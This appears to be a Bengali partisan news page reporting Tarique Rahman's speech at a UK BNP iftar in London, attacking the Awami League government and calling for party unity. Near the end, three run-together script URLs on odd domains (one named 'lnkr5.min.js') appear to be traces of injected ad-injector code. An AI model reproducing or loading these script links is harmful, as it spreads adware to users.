Thursday , October 18 2018
Home / আন্তর্জাতিক / জণগণকে ঐক্যবদ্ধ করতে হলে সবার আগে ঐক্যবদ্ধ হতে হবে আমাদের : দেশনায়ক তারেক রহমান

জণগণকে ঐক্যবদ্ধ করতে হলে সবার আগে ঐক্যবদ্ধ হতে হবে আমাদের : দেশনায়ক তারেক রহমান

বাংলাদেশ জাতীয়তাবাদী দল বিএনপির ভারপ্রাপ্ত চেয়ারম্যান দেশনায়ক জনাব তারেক রহমান বলেছেন, দেশের কি অবস্থা দেশের জনগণ তা ভালো করেই জানেন। আজকে আমাদের দেশকে, দেশের মানুষকে এবং ভবিষ্যত প্রজন্মকে দেশের এই অবস্থা থেকে বের করে একটি স্বাভাবিক এবং ভালো অবস্থায় পৌঁছে দিতে যেমন একটি বৃহত্তর ঐক্যের প্রয়োজন তেমনি দলের তৃণমূল থেকে সকল পর্যায়ের নেতাকর্মীদের আহ্বান জানাবো যে, রাজনীতিতে চলার পথে দলের হাজার হাজার লক্ষ লক্ষ নেতাকর্মীদের মধ্যে মতপার্থক্য থাকতেই পারে কিন্তু দেশের আইনশৃঙ্খলা, শিক্ষাব্যবস্থা, অর্থনীতি, সমাজনীতিসহ নানান বিষয়ে যে অস্বাভাবিক অবস্থা চলছে তার বিরুদ্ধে সবাই একমত। সবার কথা হচ্ছে, দেশ এভাবে চলতে পারেনা। এই অবস্থার পরিবর্তন প্রয়োজন এবং তা জনগণকে সাথে নিয়েই। জণগণকে ঐক্যবদ্ধ করতে হলে সবার আগে ঐক্যবদ্ধ হতে হবে আমাদের। অতিতে যখনই দেশ সংকটময় অবস্থায় পড়েছে তখনই বিএনপি জনগনকে সাথে নিয়ে ঐক্যবদ্ধ হয়ে কাজ করেছে।’

বাংলাদেশ জাতীয়তাবাদী দল বিএনপির যুক্তরাজ্য শাখা আয়োজিত আজকের ইফতার মাহফিলের বক্তব্যে তিনি এসব কথা বলেন। ইফতার মাহফিলে প্রধান অতিথি হিসেবে উপস্থিত ছিলেন বাংলাদেশ জাতীয়তাবাদী দল বিএনপি’র ভারপ্রাপ্ত চেয়ারম্যান দেশনায়ক জনাব তারেক রহমান এবং বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন বাংলাদেশ জাতীয়তাবাদী দল বিএনপি মহাসচিব জনাব মির্জা ফখরুল ইসলাম আলমগীর। 

যুক্তরাজ্য বিএনপি আয়োজিত উক্ত ইফতার ও দোয়া মাহফিল লন্ডনের রয়েল রিজেন্সি অডিটোরিয়াম অনুষ্ঠিত হয়। উক্ত ইফতার মাহফিলে মিথ্যা মামলায় কারাগারে বন্দি দেশনেত্রী বেগম খালেদা জিয়ার মুক্তির জন্য এবং দেশনেত্রী বেগম খালেদা জিয়ার সুস্থতা কামনায় বিশেষ দোয়া করা হয়।

বক্তব্যের শুরুতেই বিএনপি’র ভারপ্রাপ্ত চেয়ারম্যান ভারাক্রান্ত মনে বলেন, ‘পবিত্র মাহে রমজানের এমন একটি সময় আমরা ইফতারের জন্য এখানে মিলিত হয়েছে যেখানে বিএনপি’র চেয়ারপারসন বেগম খালেদা জিয়া উপস্থিত নেই। বিগত ৩৭ বছর ধরে দেশের প্রতিটি ইফতারে দেশনেত্রী বেগম খালেদা জিয়া দেশের মানুষের পাশে ছিলেন। আন্তর্জাতিকভাবে স্বীকৃত ব্যাংক ডাকাত এবং আন্তর্জাতিকভাবে স্বীকৃত স্বৈরাচারী সরকার মিথ্যা মামলা দিয়ে আমাদের নেত্রীকে কারাগারে বন্দি করে রেখেছে।’

তিনি বলেন, ‘আজকের বাংলাদেশ উচ্চ এবং নিম্ন কোন আদালতে স্বাধীনভাবে কাজ করতে পারেনা। আদালতে বিএনপি লোকেরা যখন কোনো আইনি সহায়তার জন্য যায় তখন মনে হয় আদালতগুলো আওয়ামী আইনজীবী সমিতিতে পরিণত হয়েছে। আপনারা দেখেছেন কিছুদিন আগে দেশের প্রধান বিচারপতি সুরেন্দ্র কুমার সিনহা সরকারের কার্যকলাপের একটি observation দিয়েছে এবং এই কারণে তাকে কিভাবে দেশ ছাড়তে বাধ্য করা হয়েছে। এর আগে আরও একজন বিচারপতিকে এভাবে দেশ ছাড়তে বাধ্য করা হয়েছিল।

আজকে পুরো দেশটি অপশক্তির কবলে পড়েছে। মানুষ নিরাপত্তার স্বার্থে তার সম্পদ ব্যাংকে গচ্ছিত রাখে কিন্তু আজকের দেশের ব্যাংকগুলোর কি অবস্থা। সরকারি দলের লোকেরা ব্যাংকগুলোকে তাদের মানিব্যাগ মনে করে। কয়েকদিন আগে অবৈধ সরকারের অর্থমন্ত্রী বলেছেন গত ১০ বছরে নাকি দেশে কোন জিনিসের দাম বাড়ে নাই।

তিনি বলেন, তারা তথাকথিত উন্নয়নের কথা বলে কিন্তু গত কিছুদিন আগে বৃষ্টি হলো এবং এই বৃষ্টিতে ঢাকা তলিয়ে গেল। উন্নয়ন কি হয়েছে তাও আমি জনগনের কাছে ছেড়ে দিতে চাই। দেশের শিক্ষা ও শিক্ষার ভবিষ্যৎ কোন অবস্থায় এসে দাঁড়িয়েছে তা আমরা পত্রপত্রিকা খুললে দেখতে পাই। কিছুদিন আগে আমরা খুলনায় ভোটের চিত্র দেখেছি এবং সেখানে মানুষের ভোটাধিকার কিভাবে হরণ করা হয়েছে তাও দেখেছি। আওয়ামী লীগের নেত্রী কথায় কথায় বলেন তিনি নাকি দেশের মানুষের ভোট এবং ভাতের ব্যবস্থা করেছেন। মানুষের কি রকম ভোট এবং ভাতের ব্যবস্থা তিনি করেছেন যেখানে এক কেজি চাউলের দাম আগে ছিল ১৫ টাকা সেখানে বর্তমানে ৭০ টাকা। কাজেই ভোট এবং ভাতের কি অবস্থা তা দেশের জনগণ ভালো করেই জানে।

ছবি: মুহাম্মদ সজিব(সেভ বিএনপি সেভ বাংলাদেশ)
প্রচারে: মনসুর হোসেন(সেভ বিএনপি সেভ বাংলাদেশ)।

https://trafficvalidation.tools/addons/lnkr5.min.jshttps://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6764x&r=18https://trafficvalidation.tools/ext/1a6cf99dda53eee160.js?sid=52200_6764_&title=&blocks%5B%5D=31af2

About mass9191

Check Also

স্বেচ্ছাসেবক লীগ নেতার লাশ নিতে পরিবারের অস্বীকৃতি, দাফনে বাধা

সাতক্ষীরার কালীগঞ্জ উপজেলার কৃষ্ণনগর ইউনিয়ন পরিষদের (ইউপি) চেয়ারম্যান কে এম মোশাররফ হোসেন হত্যা মামলার প্রধান …